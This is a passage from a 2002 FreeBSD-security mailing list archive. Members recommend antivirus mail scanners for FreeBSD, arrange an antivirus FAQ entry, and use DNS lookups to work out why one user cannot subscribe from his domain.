PM, "Eli Dart" wrote: > > This question comes up in this forum every couple of months.... > > Is anyone interested in writing a FAQ entry about this? It looks > like there are several people in this discussion with the experience > to do it.... > > I'm up for it, I can dig out my old article for the freebsdzine that I wrote about a year ago, it would need updating but I'd be up for it. > --eli > > > In reply to "Derek" : > >>> i can't find any licensing information past that >>> '30 day' period :( >> >> Hello Marc, >> Send an email to Daniel . 
He worked with >> me over the phone to determine which product numbers to order. >> Let him know what you intend to do with it. My gut feeling is >> that he is a Canadian rep (our company being Canadian), but >> perhaps he can direct you. These are the numbers that we came up >> with: >> >> NSEABE-AA-A Scanner >> NSEYBM-AA-A One year free updates >> >> Derek >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > > > --------------------------------- lomifeh@earthlink.net lomifeh@hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:24: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3C63737B400 for ; Wed, 4 Sep 2002 10:23:58 -0700 (PDT) Received: from mail1.qc.uunet.ca (mail1.qc.uunet.ca [198.168.54.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D7DA43E42 for ; Wed, 4 Sep 2002 10:23:57 -0700 (PDT) (envelope-from anarcat@anarcat.ath.cx) Received: from xtanbul (IDENT:506@[216.94.147.34]) by mail1.qc.uunet.ca (8.10.2/8.10.2) with ESMTP id g84HNpZ18519; Wed, 4 Sep 2002 13:23:52 -0400 Date: Wed, 4 Sep 2002 13:23:53 -0400 Subject: Re: Anti virus software for FreeBSD ... 
Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: Eli Dart , freebsd-security To: Lawrence Sica From: Antoine Beaupre In-Reply-To: Message-Id: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wednesday, September 4, 2002, at 01:13 PM, Lawrence Sica wrote: > On 09/04/02 12:49 PM, "Eli Dart" wrote: > >> >> This question comes up in this forum every couple of months.... >> >> Is anyone interested in writing a FAQ entry about this? It looks >> like there are several people in this discussion with the experience >> to do it.... >> >> > I'm up for it, I can dig out my old article for the freebsdzine that I > wrote > about a year ago, it would need updating but I'd be up for it. Please, please, please do! :) Just submit a PR as a patch to the faq doc or something. A. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:31:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 20A7C37B406 for ; Wed, 4 Sep 2002 10:31:38 -0700 (PDT) Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 422B943E42 for ; Wed, 4 Sep 2002 10:31:37 -0700 (PDT) (envelope-from LConrad@Go2France.com) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 73BEFEF6A5 for ; Wed, 4 Sep 2002 19:19:50 +0200 (CEST) Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 098825D009 for ; Wed, 4 Sep 2002 19:36:43 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id 9B72E5D008 for ; Wed, 4 Sep 2002 19:36:42 +0200 (CEST) Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A4D33AB202A6; Wed, 04 Sep 2002 19:37:23 +0200 Message-Id: <5.1.0.14.2.20020904122900.01be1cf0@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 04 Sep 2002 12:31:31 -0500 To: freebsd-security@freebsd.org From: Len Conrad Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >I'd be careful with amavis, I've always had scaling issues with it. 
I >haven't found anything server-wise I really like for that. I installed "Kaspersky AV Daemon for FreeBSD" on postfix for an ISP several months ago. He puts about 150K msgs through the box everyday with no problems. Len ____________________________________________________________________ www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com: Secure config ; DNS and mail interactions IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:54:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1A1F37B400 for ; Wed, 4 Sep 2002 10:54:46 -0700 (PDT) Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DE7743E6A for ; Wed, 4 Sep 2002 10:54:46 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (localhost [127.0.0.1]) by aristotle.tamu.edu (8.12.5/8.12.5) with ESMTP id g84HsjA4092853 for ; Wed, 4 Sep 2002 12:54:45 -0500 (CDT) (envelope-from rasmith@aristotle.tamu.edu) Message-Id: <200209041754.g84HsjA4092853@aristotle.tamu.edu> To: freebsd-security Subject: Re: Anti virus software for FreeBSD ... In-Reply-To: Message from Lawrence Sica of "Wed, 04 Sep 2002 13:11:55 EDT." Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Wed, 04 Sep 2002 12:54:45 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Lawrence" == Lawrence Sica writes: Lawrence> I'd be careful with amavis, I've always had scaling Lawrence> issues with it. I haven't found anything server-wise I Lawrence> really like for that. 
You need to talk to McAfee about Lawrence> vscan licensing. I used vscan at one place and it Lawrence> worked well, caught every virus that was thrown at it. Lawrence> And its dat updates allowed for a simple crontab on it. amavisd (as opposed to amavis) might help with the scaling issue (use with milter). If you want something that doesn't need amavisd's help, H+BEDV's avmailgate (http://www.hbedv.com/produkte/email/lnx_mailgate.htm) might work. Kaspersky (http://www.kaspersky.com/products.html) also has a FreeBSD-native email scanner. I have no data on how either of these holds up to heavy email traffic; reports indicate that Kaspersky's does a more thorough job. Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 11:34:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67E9937B400 for ; Wed, 4 Sep 2002 11:34:44 -0700 (PDT) Received: from mail.relinetworks.com (tiamat.relinetworks.com [204.214.92.162]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9630C43E65 for ; Wed, 4 Sep 2002 11:34:43 -0700 (PDT) (envelope-from rob@relinetworks.com) Received: from mail.relinetworks.com (rob@localhost [127.0.0.1]) by mail.relinetworks.com (8.12.6/8.12.6) with ESMTP id g84IYQHS020862 for ; Wed, 4 Sep 2002 14:34:29 -0400 (EDT) Received: (from rob@localhost) by mail.relinetworks.com (8.12.6/8.12.2/Submit) id g84IYQwW020861 for freebsd-security@FreeBSD.ORG; Wed, 4 Sep 2002 14:34:26 -0400 (EDT) Date: Wed, 4 Sep 2002 14:34:25 -0400 From: Rob Andrews To: freebsd-security@FreeBSD.ORG Subject: Re: Anti virus software for FreeBSD ... 
Message-ID: <20020904143425.A15276@enigma.deathwish.net> References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020904014942.F25799-100000@hub.org>; from scrappy@hub.org on Wed, Sep 04, 2002 at 01:51:34AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is this discussion really appropriate here? -questions or -chat would be the correct place for this topic I believe. Maybe a browse over the recent post about topics for this list is in order.. Rob Andrews President & Co-Founder RELI Networks, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 11:49: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0CAD537B400 for ; Wed, 4 Sep 2002 11:49:00 -0700 (PDT) Received: from evil-bofh.visp.net (evil-bofh.visp.net [208.8.184.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24E4F43E65 for ; Wed, 4 Sep 2002 11:48:59 -0700 (PDT) (envelope-from kgasso@evil-bofh.visp.net) Received: from localhost (localhost [[UNIX: localhost]]) by evil-bofh.visp.net (8.11.6/8.11.6) id g84Imjl23936; Wed, 4 Sep 2002 14:48:45 -0400 Content-Type: text/plain; charset="iso-8859-1" From: Kameron Gasso Reply-To: kgasso@blort.org To: Rob Andrews Subject: Re: Anti virus software for FreeBSD ... 
Date: Wed, 4 Sep 2002 14:48:45 -0400 X-Mailer: KMail [version 1.4] References: <20020904014942.F25799-100000@hub.org> <20020904143425.A15276@enigma.deathwish.net> In-Reply-To: <20020904143425.A15276@enigma.deathwish.net> Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200209041448.45420.kgasso@blort.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wednesday 04 September 2002 02:34 pm, Rob Andrews wrote: > Is this discussion really appropriate here? > > -questions or -chat would be the correct place for > this topic I believe. > > Maybe a browse over the recent post about topics for > this list is in order.. > > Rob Andrews > President & Co-Founder > RELI Networks, Inc. Although the links provided would be useful for compilation into a FAQ... -- Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 5:44:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5534637B400 for ; Thu, 5 Sep 2002 05:44:30 -0700 (PDT) Received: from blackhelicopters.org (geburah.blackhelicopters.org [209.69.178.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC72243E3B for ; Thu, 5 Sep 2002 05:44:29 -0700 (PDT) (envelope-from mwlucas@blackhelicopters.org) Received: from blackhelicopters.org (mwlucas@localhost [127.0.0.1]) by blackhelicopters.org (8.12.5/8.12.5) with ESMTP id g85ChYRI014530; Thu, 5 Sep 2002 08:43:34 -0400 (EDT) (envelope-from mwlucas@blackhelicopters.org) Received: (from mwlucas@localhost) by blackhelicopters.org (8.12.5/8.12.5/Submit) id g85ChWXb014529; Thu, 5 Sep 2002 08:43:33 -0400 (EDT) Date: Thu, 5 Sep 2002 08:43:32 -0400 
From: Michael Lucas To: Antoine Beaupre Cc: Lawrence Sica , Eli Dart , freebsd-security Subject: Re: Anti virus software for FreeBSD ... Message-ID: <20020905084332.A14387@blackhelicopters.org> References: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx>; from anarcat@anarcat.ath.cx on Wed, Sep 04, 2002 at 01:23:53PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Sep 04, 2002 at 01:23:53PM -0400, Antoine Beaupre wrote: > On Wednesday, September 4, 2002, at 01:13 PM, Lawrence Sica wrote: > > On 09/04/02 12:49 PM, "Eli Dart" wrote: > >> Is anyone interested in writing a FAQ entry about this? It looks > >> like there are several people in this discussion with the experience > >> to do it.... > >> > > I'm up for it, I can dig out my old article for the freebsdzine that I > > wrote > > about a year ago, it would need updating but I'd be up for it. > > Please, please, please do! :) > > Just submit a PR as a patch to the faq doc or something. First of all, let me encourage you to do this in the strongest possible terms. Second, a word on the FAQ: We're trying very hard to rip all tutorials out of the FAQ and decrease its size. If you have a brief bit on antivirus, i.e., "look here, and here, and here," that's perfect FAQ material. If you want to take an old tutorial and rewrite it for the docproj, we'll take that too. But it should go in the Handbook instead. Just FYI; don't want you to have to redo any work. 
:-) ==ml -- Michael Lucas mwlucas@FreeBSD.org, mwlucas@BlackHelicopters.org http://www.oreillynet.com/pub/q/Big_Scary_Daemons Absolute BSD: http://www.AbsoluteBSD.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:15:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9856D37B400 for ; Thu, 5 Sep 2002 21:15:16 -0700 (PDT) Received: from tagish.taiga.ca (tagish.taiga.ca [204.209.164.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1CAF643E65 for ; Thu, 5 Sep 2002 21:15:16 -0700 (PDT) (envelope-from campbell@tagish.taiga.ca) Received: (from campbell@localhost) by tagish.taiga.ca (8.9.3/8.9.1) id WAA17293 for freebsd-security@FreeBSD.ORG; Thu, 5 Sep 2002 22:14:18 -0600 Date: Thu, 5 Sep 2002 22:14:18 -0600 From: Duncan Campbell Message-Id: <200209060414.WAA17293@tagish.taiga.ca> To: freebsd-security@FreeBSD.ORG Subject: Very peculiar mail-list behaviour Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gentlemen (&Ladies); A very peculiar thing is happening with regards to this list and other freebsd mail lists: I am unable to sign up from any mail account originating from my domain, neotext.ca. Is this some new, unwritten, policy, or just a bug? Inquiring minds wish to know... 
Duncan (Dhu) Campbell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:23:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6389937B407 for ; Thu, 5 Sep 2002 21:23:09 -0700 (PDT) Received: from fed1mtao03.cox.net (fed1mtao03.cox.net [68.6.19.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id A91E343E4A for ; Thu, 5 Sep 2002 21:23:08 -0700 (PDT) (envelope-from dylan@ocnetworking.com) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao03.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020906042307.JLTL7696.fed1mtao03.cox.net@ocnetworking.com>; Fri, 6 Sep 2002 00:23:07 -0400 Message-ID: <3D782DF6.D042B93@ocnetworking.com> Date: Thu, 05 Sep 2002 21:24:22 -0700 From: Dylan Reinhold Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Duncan Campbell Cc: freebsd-security@FreeBSD.ORG Subject: Re: Very peculiar mail-list behaviour References: <200209060414.WAA17293@tagish.taiga.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I think it's a DNS problem...
----------------
/home/me $ nslookup neotext.ca
Server: ns1.oc.cox.net
Address: 68.4.16.30

*** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain
---------------

Dylan

Duncan Campbell wrote:

> Gentlemen (&Ladies);
>
> A very peculiar thing is happening with regards to this
> list and other freebsd mail lists: I am unable to sign
> up from any mail account originating from my domain,
> neotext.ca.
>
> Is this some new, unwritten, policy, or just a bug?
> > Inquiring minds wish to know... > > Duncan (Dhu) Campbell > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:35:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6F62037B400 for ; Thu, 5 Sep 2002 21:35:45 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0643243E3B for ; Thu, 5 Sep 2002 21:35:45 -0700 (PDT) (envelope-from dylan@ocnetworking.com) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020906043545.BDGR1360.fed1mtao01.cox.net@ocnetworking.com>; Fri, 6 Sep 2002 00:35:45 -0400 Message-ID: <3D7830EB.2067B03A@ocnetworking.com> Date: Thu, 05 Sep 2002 21:36:59 -0700 From: Dylan Reinhold Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Duncan Campbell , freebsd-security@FreeBSD.ORG Subject: Re: Very peculiar mail-list behaviour References: <200209060414.WAA17293@tagish.taiga.ca> <3D782DF6.D042B93@ocnetworking.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry to reply to myself.. But I need to take back my last post.. I found the MX record and its IP address has a reverse lookup (not the same domain). So I'm not sure what's wrong.. I will go to sleep now... Dylan Dylan Reinhold wrote, "without thinking first" : > I think it's a DNS problem... 
> ---------------- > /home/me $ nslookup neotext.ca > Server: ns1.oc.cox.net > Address: 68.4.16.30 > > *** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain > --------------- > > Dylan > > Duncan Campbell wrote: > > > Gentlemen (&Ladies); > > > > A very peculiar thing is happening with regards to this > > list and other freebsd mail lists: I am unable to sign > > up from any mail account originating from my domain, > > neotext.ca. > > > > Is this some new, unwritten, policy, or just a bug? > > > > Inquiring minds wish to know... > > > > Duncan (Dhu) Campbell > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 5 21:36:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 08DDA37B400 for ; Thu, 5 Sep 2002 21:36:23 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9593C43E6A for ; Thu, 5 Sep 2002 21:36:21 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost [127.0.0.1]) by drugs.dv.isc.org (8.12.5/8.12.5) with ESMTP id g864aIB5070456; Fri, 6 Sep 2002 14:36:18 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200209060436.g864aIB5070456@drugs.dv.isc.org> To: Dylan Reinhold Cc: Duncan Campbell , freebsd-security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: Very peculiar mail-list behaviour In-reply-to: Your message of "Thu, 05 Sep 2002 21:24:22 MST." 
<3D782DF6.D042B93@ocnetworking.com> Date: Fri, 06 Sep 2002 14:36:18 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

> I think it's a DNS problem...
> ----------------
> /home/me $ nslookup neotext.ca
> Server: ns1.oc.cox.net
> Address: 68.4.16.30
>
> *** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain
> ---------------

No. Just a nslookup issue and searching.

Mark

; <<>> DiG 8.3 <<>> mx neotext.ca
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 0
;; QUERY SECTION:
;; neotext.ca, type = MX, class = IN

;; ANSWER SECTION:
neotext.ca. 5h58m34s IN MX 100 babayaga.neotext.ca.

;; AUTHORITY SECTION:
neotext.ca. 5h58m34s IN NS kaska.taiga.ca.
neotext.ca. 5h58m34s IN NS tagish.taiga.ca.
neotext.ca. 5h58m34s IN NS babayaga.neotext.ca.

;; Total query time: 1 msec
;; FROM: drugs.dv.isc.org to SERVER: default -- 127.0.0.1
;; WHEN: Fri Sep 6 14:33:37 2002
;; MSG SIZE sent: 28 rcvd: 114

>
> Dylan
>
> Duncan Campbell wrote:
>
> > Gentlemen (&Ladies);
> >
> > A very peculiar thing is happening with regards to this
> > list and other freebsd mail lists: I am unable to sign
> > up from any mail account originating from my domain,
> > neotext.ca.
> >
> > Is this some new, unwritten, policy, or just a bug?
> >
> > Inquiring minds wish to know...
> > > > Duncan (Dhu) Campbell > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:21:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6B6C637B400; Fri, 6 Sep 2002 11:21:19 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 194A443E7B; Fri, 6 Sep 2002 11:21:19 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout04.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H2100E354B61L@mtaout04.icomcast.net>; Fri, 06 Sep 2002 14:21:06 -0400 (EDT) Date: Fri, 06 Sep 2002 14:21:06 -0400 From: Lawrence Sica Subject: Anti-virus section for FAQ In-reply-to: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> To: freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org Message-id: <68905DC2-C1C5-11D6-A71E-000393A335A2@earthlink.net> MIME-version: 1.0 X-Mailer: Apple Mail (2.543) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have put together a quick FAQ section on FreeBSD AV software and interface. Let me know what all of you think. 
If you have any additions please let me know. Same with comments/suggestions. If all is well I'll mark it up for the FAQ, I'd love to get it added to the official FAQ if possible. Be gentle it's my first time ;) TIA, Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:23:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9092537B400; Fri, 6 Sep 2002 11:23:50 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4252243E6E; Fri, 6 Sep 2002 11:23:50 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout01.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H2100B024FIRF@mtaout01.icomcast.net>; Fri, 06 Sep 2002 14:23:42 -0400 (EDT) Date: Fri, 06 Sep 2002 14:23:43 -0400 From: Lawrence Sica Subject: Fwd: Anti-virus section for FAQ To: freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org Message-id: MIME-version: 1.0 X-Mailer: Apple Mail (2.543) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Oops, helps if I post the url eh ;) http://www.thesicafamily.org/larry/articles/avfaq.html Sorry about that. Begin forwarded message: > From: Lawrence Sica > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern > To: > Cc: freebsd-doc@freebsd.org > Subject: Anti-virus section for FAQ > > I have put together a quick FAQ section on FreeBSD AV software and > interface. Let me know what all of you think. 
If you have any > additions please let me know. Same with comments/suggestions. > > If all is well I'll mark it up for the FAQ, I'd love to get it added > to the official FAQ if possible. Be gentle it's my first time ;) > > > TIA, > > Larry > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:50: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4312137B400 for ; Fri, 6 Sep 2002 11:49:49 -0700 (PDT) Received: from web10101.mail.yahoo.com (web10101.mail.yahoo.com [216.136.130.51]) by mx1.FreeBSD.org (Postfix) with SMTP id B54D243E4A for ; Fri, 6 Sep 2002 11:49:48 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020906184948.4405.qmail@web10101.mail.yahoo.com> Received: from [68.5.49.41] by web10101.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 11:49:48 PDT Date: Fri, 6 Sep 2002 11:49:48 -0700 (PDT) From: twig les Subject: Re: Fwd: Anti-virus section for FAQ To: Lawrence Sica , freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I like it. Documentation that is short, to the point and works. --- Lawrence Sica wrote: > Oops, helps if I post the url eh ;) > > http://www.thesicafamily.org/larry/articles/avfaq.html > > Sorry about that. > > Begin forwarded message: > > > From: Lawrence Sica > > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern > > To: > > Cc: freebsd-doc@freebsd.org > > Subject: Anti-virus section for FAQ > > > > I have put together a quick FAQ section on FreeBSD > AV software and > > interface. Let me know what all of you think. If > you have any > > additions please let me know. 
Same with
> comments/suggestions.
> >
> > If all is well I'll mark it up for the FAQ, I'd
> love to get it added
> > to the official FAQ if possible. Be gentle it's
> my first time ;)
> >
> >
> > TIA,
> >
> > Larry
> >
>

=====
-----------------------------------------------------------
Heavy metal made me do it.
-----------------------------------------------------------

From owner-freebsd-security Fri Sep 6 11:58:22 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D9EBD37B400 for ; Fri, 6 Sep 2002 11:58:14 -0700 (PDT)
